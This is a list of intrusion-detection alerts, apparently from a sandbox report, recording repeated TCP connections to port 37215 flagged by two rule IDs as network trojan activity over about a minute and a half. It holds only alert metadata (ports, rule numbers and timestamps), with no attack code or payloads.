                  SID:2829579
                  Source Port:38462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585966
                  SID:2835222
                  Source Port:49398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.193965
                  SID:2835222
                  Source Port:47038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448205
                  SID:2829579
                  Source Port:57636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.950473
                  SID:2835222
                  Source Port:46680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529436
                  SID:2829579
                  Source Port:46332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.420167
                  SID:2829579
                  Source Port:33970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633742
                  SID:2835222
                  Source Port:54890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137377
                  SID:2835222
                  Source Port:32858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.265342
                  SID:2829579
                  Source Port:36864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.362536
                  SID:2829579
                  Source Port:57924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.356515
                  SID:2829579
                  Source Port:47510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.424605
                  SID:2835222
                  Source Port:39160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.979192
                  SID:2835222
                  Source Port:48798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.813021
                  SID:2829579
                  Source Port:54456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.634694
                  SID:2829579
                  Source Port:56974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.386325
                  SID:2829579
                  Source Port:32772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106288
                  SID:2829579
                  Source Port:40358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159705
                  SID:2829579
                  Source Port:60650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.219162
                  SID:2829579
                  Source Port:38872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.692447
                  SID:2829579
                  Source Port:59404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.173734
                  SID:2829579
                  Source Port:38546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.865409
                  SID:2835222
                  Source Port:34740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.931140
                  SID:2829579
                  Source Port:54274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.158700
                  SID:2835222
                  Source Port:35962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.804395
                  SID:2835222
                  Source Port:49666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433517
                  SID:2835222
                  Source Port:36104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881879
                  SID:2829579
                  Source Port:54710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.766848
                  SID:2829579
                  Source Port:55510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.611798
                  SID:2835222
                  Source Port:57456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804640
                  SID:2835222
                  Source Port:43204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2835222
                  Source Port:59476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.270809
                  SID:2835222
                  Source Port:53710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.495859
                  SID:2829579
                  Source Port:39582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.860339
                  SID:2829579
                  Source Port:33928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.414315
                  SID:2835222
                  Source Port:32852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.880564
                  SID:2829579
                  Source Port:58794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867398
                  SID:2829579
                  Source Port:35128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.721683
                  SID:2835222
                  Source Port:47810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217883
                  SID:2835222
                  Source Port:58944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.680054
                  SID:2835222
                  Source Port:36022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.160089
                  SID:2835222
                  Source Port:35142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.600556
                  SID:2835222
                  Source Port:34728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.476492
                  SID:2829579
                  Source Port:57096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764696
                  SID:2835222
                  Source Port:42622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.834773
                  SID:2835222
                  Source Port:37980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.774897
                  SID:2835222
                  Source Port:48638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.249452
                  SID:2835222
                  Source Port:60052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.231574
                  SID:2829579
                  Source Port:44788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633105
                  SID:2829579
                  Source Port:32972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.970861
                  SID:2835222
                  Source Port:58682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.562470
                  SID:2835222
                  Source Port:52390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593933
                  SID:2835222
                  Source Port:56982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.591175
                  SID:2829579
                  Source Port:57656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.537516
                  SID:2829579
                  Source Port:32850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.819008
                  SID:2829579
                  Source Port:49250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.729684
                  SID:2835222
                  Source Port:36524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.730213
                  SID:2829579
                  Source Port:48212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623899
                  SID:2829579
                  Source Port:42828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.957174
                  SID:2835222
                  Source Port:53054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.484842
                  SID:2829579
                  Source Port:58008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.261102
                  SID:2829579
                  Source Port:52068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.553742
                  SID:2835222
                  Source Port:54812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.087827
                  SID:2835222
                  Source Port:33244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825579
                  SID:2835222
                  Source Port:34634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.067325
                  SID:2829579
                  Source Port:35084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.741314
                  SID:2829579
                  Source Port:59316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962913
                  SID:2835222
                  Source Port:50294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022407
                  SID:2829579
                  Source Port:37028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.474982
                  SID:2829579
                  Source Port:52366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437126
                  SID:2835222
                  Source Port:35078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.294907
                  SID:2829579
                  Source Port:48918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.842206
                  SID:2829579
                  Source Port:55472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.196604
                  SID:2829579
                  Source Port:46718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2835222
                  Source Port:40320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.866031
                  SID:2835222
                  Source Port:50376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.523161
                  SID:2829579
                  Source Port:50204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.840448
                  SID:2829579
                  Source Port:36606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875137
                  SID:2829579
                  Source Port:39914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596367
                  SID:2829579
                  Source Port:59920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926272
                  SID:2829579
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.081502
                  SID:2835222
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527287
                  SID:2835222
                  Source Port:50684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.216648
                  SID:2835222
                  Source Port:51002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.645172
                  SID:2829579
                  Source Port:42096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.259502
                  SID:2829579
                  Source Port:55244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.642671
                  SID:2835222
                  Source Port:46814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.407973
                  SID:2829579
                  Source Port:49598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358429
                  SID:2835222
                  Source Port:60760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.482479
                  SID:2835222
                  Source Port:52856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.988456
                  SID:2835222
                  Source Port:48538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.529010
                  SID:2835222
                  Source Port:51342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668166
                  SID:2829579
                  Source Port:43112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.164570
                  SID:2829579
                  Source Port:58956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.368181
                  SID:2829579
                  Source Port:54812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.937800
                  SID:2835222
                  Source Port:33998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139469
                  SID:2829579
                  Source Port:52400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.256236
                  SID:2835222
                  Source Port:37456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385980
                  SID:2829579
                  Source Port:36544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.548038
                  SID:2835222
                  Source Port:50750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.327506
                  SID:2829579
                  Source Port:47926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.792004
                  SID:2835222
                  Source Port:38832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.160309
                  SID:2835222
                  Source Port:41416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.854453
                  SID:2829579
                  Source Port:59928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.610396
                  SID:2835222
                  Source Port:46220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.526657
                  SID:2835222
                  Source Port:46274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.122842
                  SID:2829579
                  Source Port:44704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917570
                  SID:2835222
                  Source Port:59726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290741
                  SID:2835222
                  Source Port:45198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.247014
                  SID:2829579
                  Source Port:58054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.880979
                  SID:2835222
                  Source Port:45438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.608381
                  SID:2835222
                  Source Port:53492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.710871
                  SID:2829579
                  Source Port:37408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870902
                  SID:2829579
                  Source Port:42078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.463827
                  SID:2829579
                  Source Port:48090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.523426
                  SID:2835222
                  Source Port:32844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.466063
                  SID:2835222
                  Source Port:53718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.796978
                  SID:2835222
                  Source Port:60614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811511
                  SID:2835222
                  Source Port:35260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.882640
                  SID:2835222
                  Source Port:47406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953433
                  SID:2829579
                  Source Port:55746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.750468
                  SID:2829579
                  Source Port:49548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487883
                  SID:2829579
                  Source Port:52906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.529610
                  SID:2835222
                  Source Port:58538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.857207
                  SID:2829579
                  Source Port:44356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.811251
                  SID:2835222
                  Source Port:41992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.773467
                  SID:2829579
                  Source Port:37684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.010127
                  SID:2829579
                  Source Port:48426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.307803
                  SID:2835222
                  Source Port:55196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216142
                  SID:2835222
                  Source Port:48484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.822665
                  SID:2835222
                  Source Port:51854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782504
                  SID:2835222
                  Source Port:42242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.836737
                  SID:2829579
                  Source Port:48210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.354295
                  SID:2829579
                  Source Port:42824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.752992
                  SID:2829579
                  Source Port:41148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.272664
                  SID:2829579
                  Source Port:53026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.284664
                  SID:2835222
                  Source Port:45010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.488835
                  SID:2829579
                  Source Port:42780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.902594
                  SID:2829579
                  Source Port:49226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070871
                  SID:2829579
                  Source Port:60098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.579530
                  SID:2835222
                  Source Port:46524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.877508
                  SID:2829579
                  Source Port:55004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.237205
                  SID:2829579
                  Source Port:59402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005447
                  SID:2829579
                  Source Port:58040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.060305
                  SID:2835222
                  Source Port:36460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.867086
                  SID:2835222
                  Source Port:52142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.350674
                  SID:2835222
                  Source Port:58424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.393293
                  SID:2835222
                  Source Port:37662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.889582
                  SID:2835222
                  Source Port:58784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.889193
                  SID:2829579
                  Source Port:43442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.012568
                  SID:2829579
                  Source Port:46328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.351608
                  SID:2829579
                  Source Port:48410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157761
                  SID:2835222
                  Source Port:59016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603440
                  SID:2835222
                  Source Port:36132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.778339
                  SID:2835222
                  Source Port:46794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.225360
                  SID:2829579
                  Source Port:51038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.472929
                  SID:2829579
                  Source Port:55784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814574
                  SID:2835222
                  Source Port:37984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449371
                  SID:2829579
                  Source Port:33876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625472
                  SID:2835222
                  Source Port:60016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.879957
                  SID:2835222
                  Source Port:54884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132092
                  SID:2829579
                  Source Port:59698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.589721
                  SID:2829579
                  Source Port:56392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.503525
                  SID:2835222
                  Source Port:56202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.416571
                  SID:2835222
                  Source Port:35574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.441325
                  SID:2835222
                  Source Port:60416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.165980
                  SID:2835222
                  Source Port:48474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.527598
                  SID:2829579
                  Source Port:50794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.917695
                  SID:2835222
                  Source Port:52070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.125046
                  SID:2835222
                  Source Port:44020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.953196
                  SID:2829579
                  Source Port:56926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.251160
                  SID:2835222
                  Source Port:58626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.472890
                  SID:2835222
                  Source Port:34572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.836737
                  SID:2829579
                  Source Port:58474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.811395
                  SID:2829579
                  Source Port:55582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.044130
                  SID:2835222
                  Source Port:52202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505906
                  SID:2829579
                  Source Port:51000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084652
                  SID:2835222
                  Source Port:47852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328153
                  SID:2835222
                  Source Port:51238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.385136
                  SID:2829579
                  Source Port:59974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516860
                  SID:2829579
                  Source Port:39534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.402150
                  SID:2829579
                  Source Port:59754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.869680
                  SID:2829579
                  Source Port:52572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
